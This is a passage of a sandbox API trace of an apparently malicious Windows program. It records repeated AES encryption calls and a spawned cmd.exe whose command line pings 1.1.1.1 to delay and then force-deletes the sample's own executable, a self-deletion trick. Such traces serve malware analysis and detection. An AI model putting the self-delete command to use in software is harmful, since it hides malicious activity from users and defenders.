hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.597] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb4b8*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb4b8*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.601] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb578, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb578*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.601] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.601] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb558*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb558*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.601] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb438, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb438*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.601] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.601] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb498*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb498*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.601] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb4b8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb4b8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.601] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.601] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb5c8*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb5c8*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.602] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb558, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb558*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.602] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.602] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb488*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb488*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.602] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb498, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb498*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.602] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.602] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb568*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb568*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.602] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb5c8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb5c8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.603] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.603] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb648*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb648*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.603] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb488, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb488*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.603] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.603] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb3b8*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb3b8*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.603] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb568, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb568*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.603] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.604] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb538*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb538*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.604] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb648, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb648*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.604] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.604] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb578*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb578*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.604] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb3b8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb3b8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.604] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.604] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb438*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb438*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.604] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb538, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb538*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.604] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.604] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb4b8*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb4b8*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.605] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb578, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb578*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.605] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.605] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb558*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb558*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.605] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb438, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb438*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.605] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.605] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb498*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb498*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.606] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb4b8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb4b8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.606] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.606] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb5c8*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb5c8*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.606] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb558, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb558*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.625] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.625] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb488*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb488*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.625] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb498, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb498*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.625] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.625] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb568*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb568*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.625] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb5c8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb5c8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.626] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.626] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb648*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb648*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.626] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb488, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb488*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.626] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.626] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb3b8*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb3b8*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.627] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb568, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb568*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.627] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.627] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb538*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb538*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.627] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb648, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb648*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.627] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.627] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb578*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb578*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.628] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb3b8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb3b8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.628] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.628] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb438*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb438*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.628] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb538, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb538*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.628] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.633] Shell_NotifyIconW (dwMessage=0x1, lpData=0x61da78) returned 1 [0078.397] Shell_NotifyIconW (dwMessage=0x1, lpData=0x61df90) returned 1 [0079.162] Shell_NotifyIconW (dwMessage=0x1, lpData=0x61df90) returned 1 [0080.075] Shell_NotifyIconW (dwMessage=0x1, lpData=0x61e4c0) returned 1 [0083.831] NtdllDefWindowProc_W () returned 0x1 [0084.372] Shell_NotifyIconW (dwMessage=0x1, lpData=0x61df90) returned 1 [0085.137] Shell_NotifyIconW (dwMessage=0x1, lpData=0x61e4c0) returned 1 [0085.901] Shell_NotifyIconW (dwMessage=0x1, lpData=0x61df90) returned 1 [0086.686] Shell_NotifyIconW (dwMessage=0x1, lpData=0x61d428) returned 1 [0087.445] Shell_NotifyIconW (dwMessage=0x1, lpData=0x61dae0) returned 1 [0088.221] Shell_NotifyIconW (dwMessage=0x1, lpData=0x61e4c0) returned 1 [0088.974] Shell_NotifyIconW (dwMessage=0x1, lpData=0x61df90) returned 1 [0089.739] Shell_NotifyIconW (dwMessage=0x1, lpData=0x61df90) returned 1 [0090.503] Shell_NotifyIconW (dwMessage=0x1, lpData=0x61dd38) returned 1 [0091.267] Shell_NotifyIconW (dwMessage=0x1, lpData=0x61df90) returned 1 [0092.036] Shell_NotifyIconW (dwMessage=0x1, lpData=0x61df90) returned 1 [0092.796] Shell_NotifyIconW (dwMessage=0x1, lpData=0x61d928) returned 1 [0094.279] Shell_NotifyIconW (dwMessage=0x1, lpData=0x61dd38) returned 1 [0095.074] Shell_NotifyIconW (dwMessage=0x1, lpData=0x61df90) returned 1 [0096.116] Shell_NotifyIconW (dwMessage=0x1, lpData=0x61df90) returned 1 [0096.131] NtdllDefWindowProc_W () returned 0x1 [0096.132] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d928 [0096.132] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb568 [0096.132] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd38 [0096.132] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0096.132] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb538 [0096.132] NtdllDefWindowProc_W () returned 0x1 [0096.133] NtdllDefWindowProc_W () returned 0x0 [0096.134] NtdllDefWindowProc_W () returned 0x0 [0096.152] NtdllDefWindowProc_W () returned 0x0 [0096.152] NtdllDefWindowProc_W () returned 0x0 [0096.152] NtdllDefWindowProc_W () returned 0x0 [0096.153] NtdllDefWindowProc_W () returned 0x0 [0096.154] NtdllDefWindowProc_W () returned 0x0 [0096.154] NtdllDefWindowProc_W () returned 0x1 [0096.156] NtdllDefWindowProc_W () returned 0x0 [0096.182] NtdllDefWindowProc_W () returned 0x0 [0096.183] NtdllDefWindowProc_W () returned 0x0 [0096.183] SetFocus (hWnd=0x50114) returned 0x4011e [0096.184] NtdllDefWindowProc_W () returned 0x0 [0096.184] NtdllDefWindowProc_W () returned 0x0 [0096.186] NtdllDefWindowProc_W () returned 0x0 [0096.187] NtdllDefWindowProc_W () returned 0x2 [0096.187] NtdllDefWindowProc_W () returned 0x0 Thread: id = 12 os_tid = 0x5d8 Thread: id = 13 os_tid = 0x51c Process: id = "3" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x27f91000" os_pid = "0x6c0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa98" cmd_line = "cmd.exe /C ping 1.1.1.1 -n 3 -w 3000 > Nul & Del /f /q \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 7 os_tid = 0x664 [0072.398] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fc04 | out: lpSystemTimeAsFileTime=0x16fc04*(dwLowDateTime=0xc88c5ea0, dwHighDateTime=0x1d661bd)) [0072.398] GetCurrentProcessId () returned 0x6c0 [0072.398] GetCurrentThreadId () returned 0x664 [0072.398] GetTickCount () returned 0x11492af [0072.398] QueryPerformanceCounter (in: lpPerformanceCount=0x16fbfc | out: lpPerformanceCount=0x16fbfc*=19272119970) returned 1 [0072.400] GetModuleHandleA (lpModuleName=0x0) returned 0x4a680000 [0072.400] __set_app_type (_Type=0x1) [0072.401] __p__fmode () returned 0x770331f4 [0072.401] __p__commode () returned 0x770331fc [0072.401] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a6a21a6) returned 0x0 [0072.402] __getmainargs (in: _Argc=0x4a6a4238, _Argv=0x4a6a4240, _Env=0x4a6a423c, _DoWildCard=0, _StartInfo=0x4a6a4140 | out: _Argc=0x4a6a4238, _Argv=0x4a6a4240, _Env=0x4a6a423c) returned 0 [0072.402] GetCurrentThreadId () returned 0x664 [0072.402] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x664) returned 0x60 [0072.402] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0072.402] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0072.402] SetThreadUILanguage (LangId=0x0) returned 0x409 [0072.402] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0072.402] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fb94 | out: phkResult=0x16fb94*=0x0) returned 0x2 [0072.403] VirtualQuery (in: lpAddress=0x16fbcb, lpBuffer=0x16fb64, dwLength=0x1c | out: lpBuffer=0x16fb64*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0072.403] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fb64, dwLength=0x1c | out: lpBuffer=0x16fb64*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0072.403] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fb64, dwLength=0x1c | out: lpBuffer=0x16fb64*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0072.403] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fb64, dwLength=0x1c | out: lpBuffer=0x16fb64*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0072.403] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fb64, dwLength=0x1c | out: lpBuffer=0x16fb64*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x39000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0072.403] GetConsoleOutputCP () returned 0x1b5 [0072.403] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a6a4260 | out: lpCPInfo=0x4a6a4260) returned 1 [0072.403] SetConsoleCtrlHandler (HandlerRoutine=0x4a69e72a, Add=1) returned 1 [0072.403] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.403] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0072.403] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.403] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a6a41ac | out: lpMode=0x4a6a41ac) returned 1 [0072.404] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.404] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0072.404] _get_osfhandle (_FileHandle=0) returned 0x3 [0072.404] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a6a41b0 | out: lpMode=0x4a6a41b0) returned 1 [0072.405] _get_osfhandle (_FileHandle=0) returned 0x3 [0072.405] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0072.405] GetEnvironmentStringsW () returned 0x2e20f8* [0072.405] GetProcessHeap () returned 0x2d0000 [0072.405] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xada) returned 0x2e2be0 [0072.406] FreeEnvironmentStringsW (penv=0x2e20f8) returned 1 [0072.406] GetProcessHeap () returned 0x2d0000 [0072.406] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x4) returned 0x2e1898 [0072.406] GetEnvironmentStringsW () returned 0x2e20f8* [0072.406] GetProcessHeap () returned 0x2d0000 [0072.406] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xada) returned 0x2e36c8 [0072.406] FreeEnvironmentStringsW (penv=0x2e20f8) returned 1 [0072.406] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eb04 | out: phkResult=0x16eb04*=0x68) returned 0x0 [0072.406] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eb0c, lpData=0x16eb10, lpcbData=0x16eb08*=0x1000 | out: lpType=0x16eb0c*=0x0, lpData=0x16eb10*=0x0, lpcbData=0x16eb08*=0x1000) returned 0x2 [0072.406] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eb0c, lpData=0x16eb10, lpcbData=0x16eb08*=0x1000 | out: lpType=0x16eb0c*=0x4, lpData=0x16eb10*=0x1, lpcbData=0x16eb08*=0x4) returned 0x0 [0072.406] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eb0c, lpData=0x16eb10, lpcbData=0x16eb08*=0x1000 | out: lpType=0x16eb0c*=0x0, lpData=0x16eb10*=0x1, lpcbData=0x16eb08*=0x1000) returned 0x2 [0072.406] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eb0c, lpData=0x16eb10, lpcbData=0x16eb08*=0x1000 | out: lpType=0x16eb0c*=0x4, lpData=0x16eb10*=0x0, lpcbData=0x16eb08*=0x4) returned 0x0 [0072.406] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eb0c, lpData=0x16eb10, lpcbData=0x16eb08*=0x1000 | out: lpType=0x16eb0c*=0x4, lpData=0x16eb10*=0x40, lpcbData=0x16eb08*=0x4) returned 0x0 [0072.406] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eb0c, lpData=0x16eb10, lpcbData=0x16eb08*=0x1000 | out: lpType=0x16eb0c*=0x4, lpData=0x16eb10*=0x40, lpcbData=0x16eb08*=0x4) returned 0x0 [0072.406] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eb0c, lpData=0x16eb10, lpcbData=0x16eb08*=0x1000 | out: lpType=0x16eb0c*=0x0, lpData=0x16eb10*=0x40, lpcbData=0x16eb08*=0x1000) returned 0x2 [0072.407] RegCloseKey (hKey=0x68) returned 0x0 [0072.407] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eb04 | out: phkResult=0x16eb04*=0x68) returned 0x0 [0072.407] RegQueryValueExW (in: hKey=0x68, 